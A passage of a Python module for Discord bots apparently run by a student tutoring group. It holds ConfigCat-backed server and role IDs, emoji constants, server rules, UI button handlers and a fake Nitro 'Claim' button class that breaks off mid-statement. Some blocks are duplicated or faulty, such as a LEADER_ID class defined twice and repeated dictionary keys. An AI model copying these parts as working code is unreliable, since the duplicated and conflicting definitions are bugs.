ch_itAnnouncements = int(ConfigcatClient.TECH_ID_CC.get_value("ch_itannouncements", 932066545587327000))
ch_webAnnouncements = int(ConfigcatClient.TECH_ID_CC.get_value("ch_webannouncements", 932487991958577152))
ch_botAnnouncements = int(ConfigcatClient.TECH_ID_CC.get_value("ch_botannouncements", 932725755115368478))
ch_snakePit = int(ConfigcatClient.TECH_ID_CC.get_value("ch_snakepit", 942076483290161203))
# *** Categories ***
cat_developerComms = int(
ConfigcatClient.TECH_ID_CC.get_value("cat_developercomms", 873261268495106119)
)
# *** Roles ***
r_developerManager = int(
ConfigcatClient.TECH_ID_CC.get_value("r_developermanager", 805596419066822686)
)
r_assistantBotDevManager = int(
ConfigcatClient.TECH_ID_CC.get_value(
"r_assistantbotdevmanager", 816498160880844802
)
)
r_botDeveloper = int(
ConfigcatClient.TECH_ID_CC.get_value("r_botdeveloper", 805610985594814475)
)
class SandboxConfig:
"""
IDs for the Sandbox Configuration.
NOTE: If you want to add IDs, please use the format as below.
Format:
g: discord.Guild
ch: discord.TextChannel, discord.VoiceChannel, discord.StageChannel
cat: discord.CategoryChannel
r: discord.Role
msg: discord.Message
"""
mode = str(ConfigcatClient.SANDBOX_CONFIG_CC.get_value("mode", "404"))
cat_sandbox = int(
ConfigcatClient.SANDBOX_CONFIG_CC.get_value("cat_sandbox", 945459539967348787)
)
# *** TutorVC ***
ch_TV_console = int(
ConfigcatClient.SANDBOX_CONFIG_CC.get_value("ch_tv_console", 404)
)
ch_TV_startVC = int(
ConfigcatClient.SANDBOX_CONFIG_CC.get_value("ch_tv_startvc", 404)
)
# *** Category ***
cat_scienceTicket = int(
ConfigcatClient.SANDBOX_CONFIG_CC.get_value("cat_scienceticket", 800479815471333406)
)
cat_fineArtsTicket = int(
ConfigcatClient.SANDBOX_CONFIG_CC.get_value("cat_fineartsticket", 833210452758364210)
)
cat_mathTicket = int(
ConfigcatClient.SANDBOX_CONFIG_CC.get_value("cat_mathticket", 800472371973980181)
)
cat_socialStudiesTicket = int(
ConfigcatClient.SANDBOX_CONFIG_CC.get_value(
"cat_socialstudiesticket", 800481237608824882
)
)
cat_englishTicket = int(
ConfigcatClient.SANDBOX_CONFIG_CC.get_value("cat_englishticket", 800475854353596469)
)
cat_essayTicket = int(
ConfigcatClient.SANDBOX_CONFIG_CC.get_value("cat_essayticket", 854945037875806220)
)
cat_languageTicket = int(
ConfigcatClient.SANDBOX_CONFIG_CC.get_value("cat_languageticket", 800477414361792562)
)
cat_otherTicket = int(
ConfigcatClient.SANDBOX_CONFIG_CC.get_value("cat_otherticket", 825917349558747166)
)
class CH_ID:
"""
IDs of the Chat Helper server.
NOTE: If you want to add IDs, please use the format as below.
Format:
g: discord.Guild
ch: discord.TextChannel, discord.VoiceChannel, discord.StageChannel
cat: discord.CategoryChannel
r: discord.Role
msg: discord.Message
"""
# *** Guilds ***
g_ch = int(ConfigcatClient.CH_ID_CC.get_value("g_ch", 801974357395636254))
cat_essay = int(ConfigcatClient.CH_ID_CC.get_value("cat_essay", 854945037875806220))
cat_english = int(
ConfigcatClient.CH_ID_CC.get_value("cat_english", 800475854353596469)
)
class MKT_ID:
"""
IDs of the SS Marketing Department server.
NOTE: If you want to add IDs, please use the format as below.
Format:
g: discord.Guild
ch: discord.TextChannel, discord.VoiceChannel, discord.StageChannel
cat: discord.CategoryChannel
r: discord.Role
msg: discord.Message
"""
# *** Guilds ***
g_mkt = int(ConfigcatClient.MKT_ID_CC.get_value("g_mkt", 799855854182596618))
# *** Channels ***
ch_commands = int(
ConfigcatClient.MKT_ID_CC.get_value("ch_commands", 799855856295608345)
)
ch_commissionTranscripts = int(
ConfigcatClient.MKT_ID_CC.get_value(
"ch_commissiontranscripts", 820843692385632287
)
)
ch_announcements = int(ConfigcatClient.MKT_ID_CC.get_value("ch_announcements", 799855854244855847))
ch_designAnnouncements = int(ConfigcatClient.MKT_ID_CC.get_value("ch_designannouncements", 891926914258829323))
ch_mediaAnnouncements = int(ConfigcatClient.MKT_ID_CC.get_value("ch_mediaannouncements", 864050588023259196))
ch_bpAnnouncements = int(ConfigcatClient.MKT_ID_CC.get_value("ch_bpannouncements", 852371717744885760))
ch_eventsAnnouncements = int(ConfigcatClient.MKT_ID_CC.get_value("ch_eventsannouncements", 820508373791277067))
ch_modAnnouncements = int(ConfigcatClient.MKT_ID_CC.get_value("ch_modannouncements", 820532007620575282))
# *** Categories ***
cat_design = int(
ConfigcatClient.MKT_ID_CC.get_value("cat_design", 820873176208375838)
)
cat_media = int(
ConfigcatClient.MKT_ID_CC.get_value("cat_media", 882031123541143632)
)
cat_discord = int(
ConfigcatClient.MKT_ID_CC.get_value("cat_discord", 888668259220615198)
)
# *** Roles ***
r_discordManager = int(
ConfigcatClient.MKT_ID_CC.get_value("r_discordmanager", 890778255655841833)
)
r_discordTeam = int(
ConfigcatClient.MKT_ID_CC.get_value("r_discordteam", 805276710404489227)
)
r_designManager = int(
ConfigcatClient.MKT_ID_CC.get_value("r_designmanager", 882755765910261760)
)
r_designTeam = int(
ConfigcatClient.MKT_ID_CC.get_value("r_designteam", 864161064526020628)
)
r_contentCreatorManager = int(
ConfigcatClient.MKT_ID_CC.get_value(
"r_contentcreatormanager", 864165192148189224
)
)
class TUT_ID:
"""
IDs of the SS Tutoring Division server.
NOTE: If you want to add IDs, please use the format as below.
Format:
g: discord.Guild
ch: discord.TextChannel, discord.VoiceChannel, discord.StageChannel
cat: discord.CategoryChannel
r: discord.Role
msg: discord.Message
"""
# *** Guilds ***
g_tut = int(ConfigcatClient.TUT_ID_CC.get_value("g_tut", 860897711334621194))
# *** Channels ***
ch_botCommands = int(
ConfigcatClient.TUT_ID_CC.get_value("ch_botcommands", 862480236965003275)
)
ch_hourLogs = int(
ConfigcatClient.TUT_ID_CC.get_value("ch_hourlogs", 873326994220265482)
)
ch_announcements = int(ConfigcatClient.TUT_ID_CC.get_value("ch_announcements", 861711851330994247))
ch_leadershipAnnouncements = int(ConfigcatClient.TUT_ID_CC.get_value("ch_leadershipannouncements", 861712109757530112))
ch_mathAnnouncements = int(ConfigcatClient.TUT_ID_CC.get_value("ch_mathannouncements", 860929479961739274))
ch_scienceAnnouncements = int(ConfigcatClient.TUT_ID_CC.get_value("ch_scienceannouncements", 860929498782629948))
ch_englishAnnouncements = int(ConfigcatClient.TUT_ID_CC.get_value("ch_englishannouncements", 860929517102039050))
ch_ssAnnouncements = int(ConfigcatClient.TUT_ID_CC.get_value("ch_ssannouncements", 860929548639797258))
ch_csAnnouncements = int(ConfigcatClient.TUT_ID_CC.get_value("ch_csannouncements", 860929585355948042))
ch_miscAnnouncements = int(ConfigcatClient.TUT_ID_CC.get_value("ch_miscannouncements", 860929567132221481))
class HR_ID:
"""
IDs of the SS HR Department server.
NOTE: If you want to add IDs, please use the format as below.
Format:
g: discord.Guild
ch: discord.TextChannel, discord.VoiceChannel, discord.StageChannel
cat: discord.CategoryChannel
r: discord.Role
msg: discord.Message
"""
# *** Guilds ***
g_hr = int(ConfigcatClient.HR_ID_CC.get_value("g_hr", 815753072742891532))
# *** Channels ***
ch_announcements = int(ConfigcatClient.HR_ID_CC.get_value("ch_announcements", 816507730557796362))
ch_mktAnnouncements = int(ConfigcatClient.HR_ID_CC.get_value("ch_mktannouncements", 816733579660754944))
ch_acadAnnouncements = int(ConfigcatClient.HR_ID_CC.get_value("ch_acadannouncements", 816733725244522557))
ch_techAnnouncements = int(ConfigcatClient.HR_ID_CC.get_value("ch_techannouncements", 816733303629414421))
ch_leadershipAnnouncements = int(ConfigcatClient.HR_ID_CC.get_value("ch_leadershipannouncements", 819009569979629569))
# *** Roles ***
r_hrStaff = int(ConfigcatClient.HR_ID_CC.get_value("r_hrstaff", 861856418117845033))
class LEADER_ID:
"""
IDs of the Leadership Lounge server.
NOTE: If you want to add IDs, please use the format as below.
Format:
g: discord.Guild
ch: discord.TextChannel, discord.VoiceChannel, discord.StageChannel
cat: discord.CategoryChannel
r: discord.Role
msg: discord.Message
"""
# *** Guilds ***
g_leader = int(ConfigcatClient.LEADER_ID_CC.get_value("g_leader", 888929996033368154))
# *** Channels ***
ch_staffAnnouncements = int(ConfigcatClient.LEADER_ID_CC.get_value("ch_staffannouncements", 936134263777148949))
ch_envAnnouncements = int(ConfigcatClient.LEADER_ID_CC.get_value("ch_envannouncements", 942572395640782909))
ch_rebrandAnnouncements = int(ConfigcatClient.LEADER_ID_CC.get_value("ch_rebrandannouncements", 946180039630782474))
ch_workonlyAnnouncements = int(ConfigcatClient.LEADER_ID_CC.get_value("ch_workonlyannouncements", 890993285940789299))
ch_financeAnnouncements = int(ConfigcatClient.LEADER_ID_CC.get_value("ch_financeannouncements", 919341240280023060))
ch_mktAnnouncements = int(ConfigcatClient.LEADER_ID_CC.get_value("ch_mktannouncements", 942792208841588837))
ch_ssdAnnouncements = int(ConfigcatClient.LEADER_ID_CC.get_value("ch_ssdannouncements", 947656507162525698))
ch_mainAnnouncements = int(ConfigcatClient.LEADER_ID_CC.get_value("ch_mainannouncements", 936464173687259226))
# *** Roles ***
r_corporateOfficer = int(ConfigcatClient.LEADER_ID_CC.get_value("r_corporateofficer", 900940957783056444))
r_president = int(ConfigcatClient.LEADER_ID_CC.get_value("r_president", 900940957783056444))
r_vicePresident = int(ConfigcatClient.LEADER_ID_CC.get_value("r_vicepresident", 888929996175978508))
r_boardMember = int(ConfigcatClient.LEADER_ID_CC.get_value("r_boardmember", 888929996188549189))
r_director = int(ConfigcatClient.LEADER_ID_CC.get_value("r_director", 892531463482900480))
r_ssDigitalCommittee = int(ConfigcatClient.LEADER_ID_CC.get_value("r_ssdigitalcommittee", 912472488594771968))
r_informationTechnologyManager = int(ConfigcatClient.LEADER_ID_CC.get_value("r_informationtechnologymanager", 943942441357172758))
# *** Roles **
r_hrStaff = int(ConfigcatClient.HR_ID_CC.get_value("r_hrstaff", 861856418117845033))
# *** Channels ***
ch_announcements = int(ConfigcatClient.HR_ID_CC.get_value("ch_announcements", 816507730557796362))
ch_mktAnnouncements = int(ConfigcatClient.HR_ID_CC.get_value("ch_mktannouncements", 816733579660754944))
ch_acadAnnouncements = int(ConfigcatClient.HR_ID_CC.get_value("ch_acadannouncements", 816733725244522557))
ch_techAnnouncements = int(ConfigcatClient.HR_ID_CC.get_value("ch_techannouncements", 816733303629414421))
ch_leadershipAnnouncements = int(ConfigcatClient.HR_ID_CC.get_value("ch_leadershipannouncements", 819009569979629569))
class LEADER_ID:
"""
IDs of the Leadership Lounge server.
NOTE: If you want to add IDs, please use the format as below.
Format:
g: discord.Guild
ch: discord.TextChannel, discord.VoiceChannel, discord.StageChannel
cat: discord.CategoryChannel
r: discord.Role
msg: discord.Message
"""
# *** Guilds ***
g_leader = int(ConfigcatClient.LEADER_ID_CC.get_value("g_leader", 888929996033368154))
# *** Channels ***
ch_staffAnnouncements = int(ConfigcatClient.LEADER_ID_CC.get_value("ch_staffannouncements", 936134263777148949))
ch_envAnnouncements = int(ConfigcatClient.LEADER_ID_CC.get_value("ch_envannouncements", 942572395640782909))
ch_rebrandAnnouncements = int(ConfigcatClient.LEADER_ID_CC.get_value("ch_rebrandannouncements", 946180039630782474))
ch_workonlyAnnouncements = int(ConfigcatClient.LEADER_ID_CC.get_value("ch_workonlyannouncements", 890993285940789299))
ch_financeAnnouncements = int(ConfigcatClient.LEADER_ID_CC.get_value("ch_financeannouncements", 919341240280023060))
ch_mktAnnouncements = int(ConfigcatClient.LEADER_ID_CC.get_value("ch_mktannouncements", 942792208841588837))
ch_ssdAnnouncements = int(ConfigcatClient.LEADER_ID_CC.get_value("ch_ssdannouncements", 947656507162525698))
ch_mainAnnouncements = int(ConfigcatClient.LEADER_ID_CC.get_value("ch_mainannouncements", 936464173687259226))
# *** Roles ***
r_corporateOfficer = int(ConfigcatClient.LEADER_ID_CC.get_value("r_corporateofficer", 900940957783056444))
r_president = int(ConfigcatClient.LEADER_ID_CC.get_value("r_president", 900940957783056444))
r_vicePresident = int(ConfigcatClient.LEADER_ID_CC.get_value("r_vicepresident", 888929996175978508))
r_boardMember = int(ConfigcatClient.LEADER_ID_CC.get_value("r_boardmember", 888929996188549189))
r_director = int(ConfigcatClient.LEADER_ID_CC.get_value("r_director", 892531463482900480))
r_ssDigitalCommittee = int(ConfigcatClient.LEADER_ID_CC.get_value("r_ssdigitalcommittee", 912472488594771968))
r_informationTechnologyManager = int(ConfigcatClient.LEADER_ID_CC.get_value("r_informationtechnologymanager", 943942441357172758))
class CheckDB_CC:
"""
Checks and Safeguards for the Bot.
"""
MasterMaintenance = int(
ConfigcatClient.CHECK_DB_CC.get_value("mastermaintenance", False)
)
guildNone = int(ConfigcatClient.CHECK_DB_CC.get_value("guildnone", False))
externalGuild = int(ConfigcatClient.CHECK_DB_CC.get_value("externalguild", True))
ModRoleBypass = int(ConfigcatClient.CHECK_DB_CC.get_value("modrolebypass", True))
ruleBypass = int(ConfigcatClient.CHECK_DB_CC.get_value("rulebypass", True))
publicCategories = int(
ConfigcatClient.CHECK_DB_CC.get_value("publiccategories", False)
)
elseSituation = int(ConfigcatClient.CHECK_DB_CC.get_value("elsesituation", True))
PersistantChange = int(
ConfigcatClient.CHECK_DB_CC.get_value("persistantchange", True)
)
def get_value(
class_type: Union[MAIN_ID, STAFF_ID, DIGITAL_ID, TECH_ID, MKT_ID, TUT_ID, HR_ID, LEADER_ID],
value: str,
) -> int:
"""
Get a value of a ID class within ConfigCat.
Parameters:
class_type: The class of the ID which should be returned
value: The variable name (name of the ID)
"""
if ConfigcatClient.get_value(value, None) is None:
raise ValueError(f"Cannot find {value} within ConfigCat!")
if value in class_type.ID_DICT:
return int(ConfigcatClient.get_value(value, class_type.ID_DICT[value]))
else:
return int(ConfigcatClient.get_value(value, None))
def config_patch(key, value):
"""Makes a PATCH request to ConfigCat to change a Sandbox Configuration.
**NOTE:** This only supports changing the Sandbox category, anything else will not work.
Args:
key (str): Key to modify.
value (str): Value to apply.
Returns:
requests.Response: requests.Response object representing the HTTP request.
"""
url = f"https://api.configcat.com/v1/settings/{key}/value?settingKeyOrId={key}"
user = os.getenv("CONFIG_CC_USER")
password = os.getenv("CONFIG_CC_PASSWORD")
jsonPayload = [{"op": "replace", "path": "/value", "value": str(value)}]
r = requests.patch(
url,
auth=(user, password),
headers={"X-CONFIGCAT-SDKKEY": os.getenv("SANDBOX_CONFIG_CC")},
json=jsonPayload,
)
print(r.status_code)
return r
class ErrorCodes:
{
"TOE-": [discord.errors, DiscordException, ApplicationCommandError],
"TOE-": [
KeyError,
TypeError,
],
}
class Emoji:
"""
Emojis to use for the bot.
"""
space = "<:space:834967357632806932>"
confirm = "<:confirm:860926261966667806>"
deny = "<:deny:860926229335375892>"
question = "<:question:861794223027519518>"
warn = "<:warn:860926255443345409>"
lock = "<:lock:860926195087835137>"
unlock = "<:unlock:860926246937427989>"
time = "<:time:860926238737825793>"
loading = None
redissue = "<:issue:860587949263290368>"
archive = "<:file:861794167578689547>"
cycle = "<:cycle:861794132585611324>"
calender = "<:calendar:861794038739238943>"
addgear = "<:add5x:862875088311025675>"
minusgear = "<:minusgear:862875088217702421>"
invalidchannel = "<:invalidchannel:862875088361619477>"
barrow = "<:SS:865715703545069568>"
person = "<:person:883771751127990333>"
activity = "<:note:883771751190908989>"
check = "<:success:834967474101420032>"
cancel = "<:cancel:834967460075012106>"
arrow = "<:rightDoubleArrow:834967375735422996>"
mute = "<:mute:834967579264155658>"
ban = "<:ban:834967435642929162>"
reason = "<:activity:834968852558249999>"
profile = "<:profile:835213199070593035>"
creation = "<:creation:835213216299745291>"
date = "<:thewickthing:835213229294223400>"
discordLogo = "<:discord:812757175465934899>"
discordLoad = "<a:Discord:866408537503694869>"
pythonLogo = "<:python:945410067887435846>"
javascriptLogo = "<:javascript:945410211752054816>"
blobamused = "<:blobamused:895125015719194655>"
timmyBook = "<:timmy_book:880875405962264667>"
loadingGIF = "<a:Loading:904192577094426626>"
loadingGIF2 = "<a:Loading:905563298089541673>"
gsuitelogo = "<:gsuitelogo:932034284724834384>"
class hexColors:
"""
Hex colors for the bot.
"""
# *** Standard Colors ***
yellow = 0xF5DD42
orange = 0xFCBA03
blurple = 0x6C7DFE
light_purple = 0xD6B4E8
dark_gray = 0x2F3136
yellow_ticketBan = 0xEFFA16
green_general = 0x3AF250
green_confirm = 0x37E32B
red_cancel = 0xE02F2F
red_error = 0xF5160A
orange_error = 0xFC3D03
mod_blurple = 0x4DBEFF
ss_blurple = 0x7080FA
class Others:
"""
Other things to use for the bot. (Images, characters, etc.)
"""
ssLogo_png = "https://media.discordapp.net/attachments/864060582294585354/878682781352362054/ss_current.png"
error_png = "https://icons.iconarchive.com/icons/paomedia/small-n-flat/1024/sign-error-icon.png"
nitro_png = "https://i.imgur.com/w9aiD6F.png"
# *** Timmy Images ***
timmyDog_png = "https://cdn.discordapp.com/attachments/875233489727922177/876610305852051456/unknown.png"
timmyLaptop_png = "https://i.gyazo.com/5cffb6cd45e5e1ee9b1d015bccbdf9e6.png"
timmyHappy_png = "https://i.gyazo.com/a0b221679db0f980504e64535885a5fd.png"
timmyBook_png = "https://media.discordapp.net/attachments/875233489727922177/876603875329732618/timmy_book.png?width=411&height=533"
timmyTeacher_png = "https://media.discordapp.net/attachments/875233489727922177/877378910214586368/tutoring.png?width=411&height=532"
timmyDonation_png = "timmydonation.png"
timmyDonation_path = "./utils/bots/CoreBot/LogFiles/timmydonation.png"
space_character = " "
TICKET_INACTIVE_TIME = 1440
CHID_DEFAULT = 905217698865225728
CHHelperRoles = {
"Essay": 854135371507171369,
"Essay Reviser": 854135371507171369,
"English": 862160296914714645,
"English Language": 862160080896000010,
"English Literature": 862160567921541171,
"Math": 862160874214129705,
"Algebra": 862161250656976896,
"Geometry": 862160836029317160,
"Precalculus": 862160740509024337,
"Calculus": 862160709252939837,
"Statistics": 862160620563202079,
"Science": 862160358264274944,
"Biology": 862160682472439828,
"Chemistry": 862160317794615296,
"Physics": 862160774075383808,
"Psych": 862160362677993493,
"Social Studies": 862160071466811412,
"World History": 862159919943254056,
"US History": 862159910254673982,
"US Gov": 862160366096482314,
"Euro": 862159915660476427,
"Human Geo": 862960195108601866,
"Economy": 862159734257352724,
"Languages": 862160078370635796,
"French": 862160075559665724,
"Chinese": 862143325683318804,
"Korean": 862143319458316298,
"Spanish": 856704808807563294,
"Computer Science": 862160355622780969,
"Fine Arts": 862160360626716733,
"Research": 862159906148450314,
"SAT/ACT": 862159736384258048,
}
rulesDict = {
1: f"All Terms of Service and Community Guidelines apply. && {Emoji.barrow} https://discord.com/terms\n{Emoji.barrow} https://discord.com/guidelines",
2: f"Keep chats and conversations mainly in English. && {Emoji.barrow} Full-blown conversations in a different language that disrupt the environment are not allowed.\n{Emoji.barrow} Disrupting an existing conversation in English in voice chat is not allowed.",
3: f"Keep chats and conversations relevant. && {Emoji.barrow} Keep discussions about politics or anything else in <#773366189648642069>.\n{Emoji.barrow} Ask homework questions in the homework channels or tickets.",
4: f"No content that does not belong in a school server. && {Emoji.barrow} No inappropriate user profiles, avatars, banners, statuses, about me, usernames, or nicknames.\n{Emoji.barrow} No sharing of content that glorifies or promotes suicide or self-harm.\n{Emoji.barrow} No trolling, raiding, epileptic, disturbing, suggestive, or offensive behavior.\n{Emoji.barrow} No sexist, racist, homophobic, transphobic, xenophobic, islamophobic, pedophilic, creepy behavior, etc.",
5: f"No advertising or self-promotion (unless given explicit permission). && {Emoji.barrow} Self-advertising a website, group, or anything else through DMs, VC or in the server is not allowed.\n{Emoji.barrow} Explicitly asking users to look at advertisements in status/About Me is not allowed.",
6: f"No toxic behavior or harassment. && {Emoji.barrow} No discriminatory jokes or language towards an individual or group due to race, ethnicity, nationality, sex, gender, sexual orientation, religious affiliation, or disabilities.\n{Emoji.barrow} Disrespect of members is not allowed, especially if it is continuous, repetitive, or severe.\n{Emoji.barrow} Encouraging toxicity, harassment, bullying, and anything of the sort is prohibited.",
7: f"No illegal or explicit material. && {Emoji.barrow} Discussing or sharing illegal content is prohibited. This includes, but is not limited to: copyrighted content, pirated content, illegal activities, crimes, IPGrabbers, phishing links.\n{Emoji.barrow} Any form of NSFW, NSFL, or explicit content (pornographic, overtly sexual, overly gory) is prohibited.",
8: f"No DDoS, dox, death or any other sort of threats. && {Emoji.barrow} Indirect or direct threats to harm someone else are strictly prohibited and causes for immediate ban.\n{Emoji.barrow} DDoS (Distributed Denial of Service): sending a large amount of requests in a short amount of time.\n{Emoji.barrow} Dox: revealing any private information of another member, such as real name or address, without consent.",
9: f"No slurs and excessive or harmful profanity usage. && {Emoji.barrow} Using or attempting to use slurs and racist terms is prohibited.\n{Emoji.barrow} Excessive profanity, verbal abuse and insults are prohibited.",
10: f"No cheating in any form. && {Emoji.barrow} It is strictly prohibited to cheat or engage in academic dishonesty anywhere in the server.",
11: f"No spamming in any form. && {Emoji.barrow} Spamming links, images, messages, roles, emojis, emotes, emote reactions, or anything else is not allowed.",
12: f"No impersonation in any form. && {Emoji.barrow} Changing your username or avatar to something similar as any staff or members with the intent to mimic them and create confusion is prohibited. ",
13: f"No disruptive behavior in voice chat. && {Emoji.barrow} No continuous hopping between voice chats.\n{Emoji.barrow} No starting and closing streams in short intervals.\n{Emoji.barrow} No loud, annoying, or high-pitched noises.\n{Emoji.barrow} No voice changers if asked to stop.",
14: f"No evading user blocks, punishments, or bans by using alternate accounts. && {Emoji.barrow} Sending unwanted, repeated friend requests or messages to contact someone who has blocked you is prohibited.\n{Emoji.barrow} Creating alternate accounts to evade a punishment or ban, harass or impersonate someone, or participate in a raid are all strictly prohibited.\n{Emoji.barrow} Suspicions of being an alternate account are cause for a ban with no prior warning.\n{Emoji.barrow} To discuss punishments or warnings, create a support ticket or talk to a moderator in DMs.",
}
class bcolors:
HEADER = "\033[95m"
OKBLUE = "\033[94m"
OKCYAN = "\033[96m"
OKGREEN = "\033[92m"
WARNING = "\033[93m"
FAIL = "\033[91m"
ENDC = "\033[0m"
BOLD = "\033[1m"
UNDERLINE = "\033[4m"
class EmbeddedActivity:
awkword = 879863881349087252
betrayal = 773336526917861400
cg2_qa = 832012815819604009
cg2_staging = 832012730599735326
cg3_dev = 832012682520428625
cg3_prod = 832013003968348200
cg3_qa = 832012894068801636
cg3_staging = 832012938398400562
cg4_dev = 832013108234289153
cg4_prod = 832025144389533716
cg4_qa = 832025114077298718
cg4_staging = 832025061657280566
chess_in_the_park_dev = 832012586023256104
chess_in_the_park = 832012774040141894
decoders_dev = 891001866073296967
doodle_crew = 878067389634314250
doodle_crew_dev = 878067427668275241
fishington = 814288819477020702
letter_tile = 879863686565621790
pn_staging = 763116274876022855
poker_night = 755827207812677713
poker_qa = 801133024841957428
putts = 832012854282158180
sketchy_artist = 879864070101172255
sketchy_artist_dev = 879864104980979792
spell_cast = 852509694341283871
watch_together = 880218394199220334
watch_together_dev = 880218832743055411
word_snacks = 879863976006127627
word_snacks_dev = 879864010126786570
youtube_together = 755600276941176913
class SelectMenuHandler(ui.Select):
"""Adds a SelectMenu to a specific message and returns it's value when option selected.
Usage:
To do something after the callback function is invoked (the button is pressed), you have to pass a
coroutine to the class. IMPORTANT: The coroutine has to take two arguments (discord.Interaction, discord.View)
to work.
"""
def __init__(
self,
options: typing.List[SelectOption],
custom_id: typing.Union[str, None] = None,
place_holder: typing.Union[str, None] = None,
max_values: int = 1,
min_values: int = 1,
disabled: bool = False,
select_user: typing.Union[discord.Member, discord.User, None] = None,
roles: List[discord.Role] = None,
interaction_message: typing.Union[str, None] = None,
ephemeral: bool = True,
coroutine: coroutineType = None,
view_response=None,
):
"""
Parameters:
options: List of discord.SelectOption
custom_id: Custom ID of the view. Default to None.
place_holder: Place Holder string for the view. Default to None.
max_values Maximum values that are selectable. Default to 1.
min_values: Minimum values that are selectable. Default to 1.
disabled: Whenever the button is disabled or not. Default to False.
select_user: The user that can perform this action, leave blank for everyone. Defaults to None.
interaction_message: The response message when pressing on a selection. Default to None.
ephemeral: Whenever the response message should only be visible for the select_user or not. Default to True.
"""
self.options_ = options
self.custom_id_ = custom_id
self.select_user = select_user
self.roles = roles
self.disabled_ = disabled
self.placeholder_ = place_holder
self.max_values_ = max_values
self.min_values_ = min_values
self.interaction_message_ = interaction_message
self.ephemeral_ = ephemeral
self.coroutine = coroutine
self.view_response = view_response
if self.custom_id_:
super().__init__(
options=self.options_,
placeholder=self.placeholder_,
custom_id=self.custom_id_,
disabled=self.disabled_,
max_values=self.max_values_,
min_values=self.min_values_,
)
else:
super().__init__(
options=self.options_,
placeholder=self.placeholder_,
disabled=self.disabled_,
max_values=self.max_values_,
min_values=self.min_values_,
)
async def callback(self, interaction: discord.Interaction):
if self.select_user in [None, interaction.user] or any(
role in interaction.user.roles for role in self.roles
):
if self.custom_id_ is None:
self.view.value = self.values[0]
else:
# self.view.value = self.custom_id_
self.view_response = self.values[0]
if self.interaction_message_:
await interaction.response.send_message(
content=self.interaction_message_, ephemeral=self.ephemeral_
)
if self.coroutine is not None:
await self.coroutine(interaction, self.view)
else:
self.view.stop()
else:
await interaction.response.send_message(
content="You're not allowed to interact with that!", ephemeral=True
)
class ButtonHandler(ui.Button):
"""
Adds a Button to a specific message and returns it's value when pressed.
Usage:
To do something after the callback function is invoked (the button is pressed), you have to pass a
coroutine to the class. IMPORTANT: The coroutine has to take two arguments (discord.Interaction, discord.View)
to work.
"""
def __init__(
self,
style: ButtonStyle,
label: str,
custom_id: typing.Union[str, None] = None,
emoji: typing.Union[str, None] = None,
url: typing.Union[str, None] = None,
disabled: bool = False,
button_user: typing.Union[discord.Member, discord.User, None] = None,
roles: List[discord.Role] = None,
interaction_message: typing.Union[str, None] = None,
ephemeral: bool = True,
coroutine: coroutineType = None,
):
"""
Parameters:
style: Label for the button
label: Custom ID that represents this button. Default to None.
custom_id: Style for this button. Default to None.
emoji: An emoji for this button. Default to None.
url: A URL for this button. Default to None.
disabled: Whenever the button should be disabled or not. Default to False.
button_user: The user that can perform this action, leave blank for everyone. Defaults to None.
roles: The roles which the user needs to be able to click the button.
interaction_message: The response message when pressing on a selection. Default to None.
ephemeral: Whenever the response message should only be visible for the select_user or not. Default to True.
coroutine: A coroutine that gets invoked after the button is pressed. If None is passed, the view is stopped after the button is pressed. Default to None.
"""
self.style_ = style
self.label_ = label
self.custom_id_ = custom_id
self.emoji_ = emoji
self.url_ = url
self.disabled_ = disabled
self.button_user = button_user
self.roles = roles
self.interaction_message_ = interaction_message
self.ephemeral_ = ephemeral
self.coroutine = coroutine
if self.custom_id_:
super().__init__(
style=self.style_,
label=self.label_,
custom_id=self.custom_id_,
emoji=self.emoji_,
url=self.url_,
disabled=self.disabled_,
)
else:
super().__init__(
style=self.style_,
label=self.label_,
emoji=self.emoji_,
url=self.url_,
disabled=self.disabled_,
)
async def callback(self, interaction: discord.Interaction):
if self.button_user in [None, interaction.user] or any(
role in interaction.user.roles for role in self.roles
):
if self.custom_id_ is None:
self.view.value = None
else:
self.view.value = self.custom_id_
if self.interaction_message_:
await interaction.response.send_message(
content=self.interaction_message_, ephemeral=self.ephemeral_
)
if self.coroutine is not None:
await self.coroutine(interaction, self.view)
else:
self.view.stop()
else:
await interaction.response.send_message(
content="You're not allowed to interact with that!", ephemeral=True
)
def getGuildList(bot: commands.Bot, exemptServer: List[int] = None) -> list:
guildList = []
for guild in bot.guilds:
if guild.id in exemptServer:
continue
guildList.append(guild.id)
return guildList
class TechnicalCommissionConfirm(discord.ui.View):
def __init__(self, bot):
super().__init__()
self.value = None
self.bot = bot
@discord.ui.button(
label="Confirm",
style=discord.ButtonStyle.green,
emoji="✅",
custom_id="persistent_view:tempconfirm",
)
async def confirm(
self, button: discord.ui.Button, interaction: discord.Interaction
):
TranscriptLOG = self.bot.get_channel(TECH_ID.ch_ticketLog)
ch = await self.bot.fetch_channel(interaction.channel_id)
await rawExport(self, ch, TranscriptLOG, interaction.user)
await ch.delete()
@discord.ui.button(label="Cancel", style=discord.ButtonStyle.red, emoji="❌")
async def cancel(self, button: discord.ui.Button, interaction: discord.Interaction):
await interaction.message.delete()
await interaction.response.send_message(
"ok, not removing this channel.", ephemeral=True
)
self.value = False
self.stop()
class LockButton(discord.ui.View):
def __init__(self, bot):
super().__init__(timeout=None)
self.value = None
self.bot = bot
@discord.ui.button(
label="Lock",
style=discord.ButtonStyle.green,
custom_id="persistent_view:lock",
emoji="🔒",
)
async def lock(self, button: discord.ui.Button, interaction: discord.Interaction):
self.value = True
ch = await self.bot.fetch_channel(interaction.channel_id)
TempConfirmInstance = TechnicalCommissionConfirm(self.bot)
msg = await ch.send(
"Are you sure you want to close this ticket?", view=TempConfirmInstance
)
class GSuiteVerify(discord.ui.View):
def __init__(self):
super().__init__(timeout=None)
self.value = None
@discord.ui.button(
label="Verify with GSuite",
style=discord.ButtonStyle.blurple,
custom_id="persistent_view:gsuiteverify",
emoji=Emoji.gsuitelogo,
)
async def lock(self, button: discord.ui.Button, interaction: discord.Interaction):
self.value = True
class TempConfirm(discord.ui.View):
def __init__(self):
super().__init__()
self.value = None
@discord.ui.button(
label="Confirm",
style=discord.ButtonStyle.green,
emoji="✅",
custom_id="persistent_view:tempconfirm",
)
async def confirm(
self, button: discord.ui.Button, interaction: discord.Interaction
):
self.value = True
self.stop()
@discord.ui.button(label="Cancel", style=discord.ButtonStyle.red, emoji="❌")
async def cancel(self, button: discord.ui.Button, interaction: discord.Interaction):
await interaction.response.send_message("Cancelling", ephemeral=True)
self.value = False
self.stop()
class NitroConfirmFake(discord.ui.View):
def __init__(self):
super().__init__()
self.value = None
@discord.ui.button(
label="Claim",
style=discord.ButtonStyle.green,
custom_id="persistent_view:nitrofake",
)
async def claim(self, button: discord.ui.Button, interaction: discord.Interaction):
try:
await interaction.response.send_message(
